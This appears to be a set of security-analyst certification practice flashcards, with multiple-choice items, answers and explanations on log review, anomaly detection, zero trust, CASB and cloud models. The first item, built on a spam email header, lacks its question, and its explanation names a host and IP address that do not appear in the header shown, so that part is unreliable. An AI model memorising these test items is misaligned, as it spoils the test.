Received: from mf-smf-uob01l.ccn.ad.jp (mf-smf-uob01l [153.149.233.226]) by mf-smf-uob01l.ccn.ad.jp (Postfix) with ESMTP id c1fcb1fc22E; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
Received: from wm-webmail1.ccn.ad.jp (wm-webmail1.ccn.ad.jp [153.149.232.82]) by mf-smf-uob01l.ccn.ad.jp (Postfix-1.4.0[patch-3.4.4]
with ESMTP id c1fcbcb2c232; Wed, 5 Jul 2017 01:33:05 +0900
Received: from wm-webmail1.ccn.ad.jp ([153.149.232.82]) by wm-ps01.wmta-uob01l with id 9gbLv0239JZEyhW019gbLv0; Tue, 04 Jul 2017 16:33:05 +0000
Received: from mzstore241.ccn.ad.jp (mz-tb241.ccn.ad.jp [180.8.112.196]) by wm-webmail1.ccn.ad.jp (Postfix) with ESMTP; Wed,
5 Jul 2017 01:33:05 +0900 (JST)
Date: Wed, 5 Jul 2017 01:33:05 +0900 (JST)
From: Carmen Victoria Garci <"www."fccrea.ccn.ne.jp>
Reply-To: Carmen Victoria Garci <clarapgracia149@gmail.com>
Message-ID: <774131614.77452137.1499186315187.JavaMail.rootfccrea.ccn.ne.jp>
Subject: ATTENTION:THE ORDER OF THIS EMAIL.
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
X-Originating-IP: [197.233.216.24]</www.fccrea.ccn.ne.jp>

• Victoria Garci’s email address is tntexpress819@yahoo.com.
• The sender sent via Yahoo.
• The sender sent via a system in Japan.
• The sender sent via Gmail.

Answer 157

The sender sent via a system in Japan.

Headers can be helpful when tracking down spam email, but spammers often use a number of methods to obfuscate the original sender’s IP address, email, or other details. Unfortunately, email addresses are often spoofed, and the email address may be falsified. In this case, the only verifiable information in these headers is the IP address of the originating host, mf-smf-ucb011.ocn.ad.jp (mf-smf-ucb011.ocn.ad.jp) [153.149.228.228]. At times even this detail can be forged, but in most cases, this is simply a compromised host or one with an open email application that spammers can leverage to send bulk email.

Question 158

202- Nara is reviewing event logs to determine who has accessed a workstation after business hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?

• Login failures
• User IDs from logins
• Successful logins
• Times from logins

Answer 158

Successful logins

The system Nara is reviewing has only login failure logging turned on and will not capture successful logins. She cannot rely on the logs to show her who logged in but may be able to find other forensic indicators of activity, including changes in the user profile directories and application caches.

Question 159

203- Profiling networks and systems can help to identify unexpected activity. What type of detection can be used once a profile has been created?

• Dynamic analysis
• Anomaly analysis
• Static analysis
• Behavioral analysis

Answer 159

Anomaly analysis

Profiling networks and systems will provide a baseline behavior set. A SIEM or similar system can monitor for differences or anomalies that are recorded as events. Once correlated with other events, these can be investigated and may prove to be security incidents. Dynamic and static analyses are types of code analysis, whereas behavioral, or heuristic, analysis focuses on behaviors that are indicative of an attack or other undesirable behavior. Behavioral analysis does not require a baseline; instead, it requires knowing what behavior is not acceptable.

Question 160

secpol.msc

Answer 160

Local Security Policy manager for Windows

a Windows tool related to local security policy. Can assist in analyzing logs and recommending remediation

Question 161

204- Singh is attempting to diagnose high memory utilization issues on a macOS system and notices a chart showing memory pressure. What does memory pressure indicate for macOS when the graph is yellow and looks like the following image?

• Memory resources are available
• Memory resources are available but being tasked by memory management processes.
• Memory resources are in danger, and applications will be terminated to free up memory.
• Memory resources are depleted, and the disk has begun to swap.

Answer 161

Memory resources are available but being tasked by memory management processes.

Memory pressure is a macOS‐specific term used to describe the availability of memory resources. Yellow segments on a memory pressure chart indicate that memory resources are still available but are being tasked by memory management processes such as compression.

Question 162

205- Saanvi needs to verify that his Linux system is sending system logs to his SIEM. What method can he use to verify that the events he is generating are being sent and received properly?

• Monitor traffic by running Wireshark or tcpdump on the system.
• Configure a unique event ID and send it.
• Monitor traffic by running Wireshark or tcpdump on the SIEM device.
• Generate a known event ID and monitor for it.

Answer 162

Generate a known event ID and monitor for it.

Saanvi simply needs to generate a known event ID that he can uniquely verify. Once he does, he can log into the SIEM and search for that event at the time he generated it to validate that his system is sending syslogs.

Question 163

206- Maria wants to understand what a malware package does and executes it in a virtual machine that is instrumented using tools that will track what the program does, what changes it makes, and what network traffic it sends while allowing her to make changes on the system or to click files as needed. What type of analysis has Maria performed?

• Manual code reversing
• Interactive behavior analysis
• Static property analysis
• Dynamic code analysis

Answer 163

Interactive behavior analysis

Maria has performed interactive behavior analysis. This process involves executing a file in a fully instrumented environment and then tracking what occurs. Maria’s ability to interact with the file is part of the interactive element and allows her to simulate normal user interactions as needed or to provide the malware with an environment where it can interact like it would in the wild.

Question 164

208- A major new botnet infection that uses a peer‐to‐peer command‐and‐control process has been released. Latisha wants to detect infected systems but knows that peer‐to‐peer communication is irregular and encrypted. If she wants to monitor her entire network for this type of traffic, what method should she use to catch infected systems?

• Build an IPS rule to detect all peer‐to‐peer communications that match the botnet’s installer signature.
• Use beaconing detection scripts focused on the command‐and‐control systems.
• Capture network flows for all hosts and use filters to remove normal traffic types.
• Immediately build a network traffic baseline and analyze it for anomalies.

Answer 164

Capture network flows for all hosts and use filters to remove normal traffic types.

The only solution from Latisha’s list that might work is to capture network flows, remove normal traffic, and then analyze what is left. Peer‐to‐peer botnets use rapidly changing control nodes and don’t rely on a consistent, identifiable control infrastructure, which means that traditional methods of detecting beaconing will typically fail. They also use quickly changing infection packages, making signature‐based detection unlikely to work. Finally, building a network traffic baseline after an infection will typically make the infection part of the baseline, resulting in failure to detect malicious traffic.

Question 165

212- amantha is preparing a report describing the common attack models used by advanced persistent threat actors. Which of the following is a typical characteristic of APT attacks?

• They involve sophisticated DDoS attacks.
• They quietly gather information from compromised systems.
• They rely on worms to spread.
• They use encryption to hold data hostage.

Answer 165

They quietly gather information from compromised systems.

Advanced persistent threats often leverage email, phishing, or a vulnerability to access systems and insert malware. Once they have gained a foothold, APT threats typically work to gain access to more systems with greater privileges. They gather data and information and then exfiltrate that information while working to hide their activities and maintain long‐term access. DDoS attacks, worms, and encryption‐based extortion are not typical APT behaviors.

Question 166

214- Barb wants to detect unexpected output from the application she is responsible for managing and monitoring. What type of tool can she use to detect unexpected output effectively?

• A log analysis tool
• A behavior‐based analysis tool
• A signature‐based detection tool
• Manual analysis

Answer 166

A behavior‐based analysis tool

Barb can configure a behavior‐based analysis tool that can capture and analyze normal behavior for her application and then alert her when unexpected behavior occurs. Although this requires initial setup, it requires less long‐term work than constant manual monitoring, and unlike signature‐based or log analysis‐based tools, it will typically handle unexpected outputs appropriately.

Question 167

216- Amanda is reviewing the security of a system that was previously compromised. She is searching for signs that the attacker has achieved persistence on the system. Which one of the following should be her highest priority to review?

• Scheduled tasks
• Network traffic
• Running processes
• Application logs

Answer 167

Scheduled tasks

Attackers commonly use scheduled tasks to achieve persistence. If an analyst forgets to check for scheduled tasks, attackers may leave a task scheduled that opens up a vulnerability at a later date, achieving persistence on the system

Question 168

syslog levels

Answer 168

• Level 0: Emergencies indicate a device shutdown due to failure.
• Level 1: Alerts signify that a temperature limit has been exceeded.
• Level 2: Critical events, such as software failure.
• Level 3: Errors, for example, an interface down message.
• Level 4: Warning indicate a configuration change.
• Level 5: Notifications such as a line protocol up/down.
• Level 6: Information such as an ACL violation.
• Level 7: Debugging message

Question 169

219- You are looking for operating system configuration files that are stored on a Linux system. Which one of the following directories is most likely to contain those files?

• /bin
• /
• /etc
• /dev

Answer 169

/etc

The /etc directory normally contains system‐level configuration files. Files are generally not stored at the root level (/) of a file system. The /bin directory is used for binary executables, and the /dev directory is used for devices.

Question 170

222- Matthew is reviewing a new cloud service offering that his organization plans to adopt. In this offering, a cloud provider will create virtual server instances under the multitenancy model. Each server instance will be accessible only to Matthew’s company. What cloud deployment model is being used?

• Hybrid cloud
• Public cloud
• Private cloud
• Community cloud

Answer 170

Public cloud

The key to answering this question is recognizing that the multitenancy model involves many different customers accessing cloud resources hosted on shared hardware. That makes this a public cloud deployment, regardless of the fact that access to a particular server instance is limited to Matthew’s company. In a private cloud deployment, only Matthew’s company would have access to any resources hosted on the same physical hardware. This is not multitenancy. There is no indication that Matthew’s organization is combining resources of public and private cloud computing, which would be a hybrid cloud, or that the resource use is limited to members of a particular group, which would be a community cloud.

Question 171

223- In a zero‐trust network architecture, what criteria is used to make trust decisions?

• Identity of a user or device
• IP address
• Network segment
• VLAN membership

Answer 171

Identity of a user or device

Zero‐trust network architectures make trust decisions based upon the identity of the user or device making the request. They do not make trust decisions based upon network location characteristics, such as an IP address, VLAN assignment, or network segment.

Question 172

224- Lynn’s organization is moving toward a secure access service edge (SASE) approach to security. Which one of the following technologies is least likely to be included in a SASE architecture?

• NGFW
• CASB
• Hypervisor
• WAN

Answer 172

Hypervisor

Secure access service edge (SASE) approaches to network security seek to implement zero‐trust networking in a way that integrates cloud security services. Next‐generation firewalls (NGFWs), cloud access security brokers (CASBs), and wide area network (WAN) connections are all critical components of SASE deployments. Hypervisors are used to create virtual machines, and, while they may be leveraged in a SASE environment, they are not themselves a direct part of the SASE architecture.

Question 173

231- What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?

• DHS
• SANS
• CERTS
• ISACs

Answer 173

ISACs

The U.S. government created information sharing and analysis centers (ISACs). ISACs help infrastructure owners and operators share threat information, and they provide tools and assistance to their members.

Question 174

233- The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?

• The threat actor
• The targeting method
• The attack vector
• The organizational weakness

Answer 174

The attack vector

The ATT&CK framework defines the attack vector as the specifics behind how the adversary would attack the target. You don’t have to memorize ATT&CK to pass the exam, but you should be prepared to encounter questions that you need to narrow down based on what knowledge you do have. Here you can rule out the threat actor and targeting method and then decide between the attack vector and organizational weakness.

Question 174

235- Brian is selecting a CASB for his organization, and he would like to use an approach that interacts with the cloud provider directly. Which CASB approach is most appropriate for his needs?

• Inline CASB
• Outsider CASB
• Comprehensive CASB
• API‐based CASB

Answer 174

API‐based CASB

API‐based CASB solutions interact directly with the cloud provider through the provider’s API. Inline CASB solutions intercept requests between the user and the provider. Outsider and comprehensive are not categories of CASB solutions.

Question 175

Inline CASB

Answer 175

Inline CASB solutions intercept requests between the user and the provider

Question 176

API‐based CASB

Answer 176

API‐based CASB solutions interact directly with the cloud provider through the provider’s API

Question 177

236- Sherry is deploying a zero‐trust network architecture for her organization. In this approach, which one of the following characteristics would be least important in validating a login attempt?

• User identity
• IP address
• Geolocation
• Nature of requested access

Answer 177

IP address

The defining characteristic of zero‐trust network architecture is that trust decisions are not based on network location, such as IP address. It is appropriate to use other characteristics, such as a user’s identity, the nature of the requested access, and the user’s geographic (not network!) location.

Question 178

237- Lisa wants to integrate with a cloud identity provider that uses OAuth 2.0, and she wants to select an appropriate authentication framework. Which of the following best suits her needs?

• OpenID Connect
• SAML
• RADIUS
• Kerberos

Answer 178

OpenID Connect

OpenID Connect is an authentication layer that works with OAuth 2.0 as its underlying authorization framework. It has been widely adopted by cloud service providers and is widely supported. SAML, RADIUS, and Kerberos are alternative authentication technologies but do not have the same level of seamless integration with OAuth.

Question 179

239- Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?

• Vulnerability feed
• IoC
• TTP
• RFC

Answer 179

IoC

Specific details of attacks that may be used to identify compromises are known as indicators of compromise (IoC). This data may also be described as an adversary tool, tactic, or procedure (TTP), but the fact that it is a set of file signatures makes it more closely match the definition of an IoC.

Question 180

241- Brian recently joined an organization that runs the majority of its services on a virtualization platform located in its own datacenter but also leverages an IaaS provider for hosting its web services and an SaaS email system. What term best describes the type of cloud environment this organization uses?

• Public cloud
• Dedicated cloud
• Private cloud
• Hybrid cloud

Answer 180

Hybrid cloud

The scenario describes a mix of public cloud and private cloud services. This is an example of a hybrid cloud environment.

Question 181

FDE

Answer 181

full disk encryption (DAH!)

Question 182

249- Which of the following measures is not commonly used to assess threat intelligence?

• Timeliness
• Detail
• Accuracy
• Relevance

Answer 182

Detail

While higher levels of detail can be useful, it isn’t a common measure used to assess threat intelligence. Instead, the timeliness, accuracy, and relevance of the information are considered critical to determining whether you should use the threat information.

Question 183

250- Sara has been asked to explain to her organization how an endpoint detection and response (EDR) system could help the organization. Which of the following functions is not a typical function for an EDR system?

• Endpoint data collection and central analysis
• Automated responses to threats
• Forensic analysis to help with threat response and detection
• Cloud and network data collection and central analysis

Answer 183

Cloud and network data collection and central analysis

Endpoint detection and response (EDR) tools do not collect data such as network traffic or cloud infrastructure. They do collect data from endpoints and centralize it for analysis and response, including forensic and threat detection capabilities.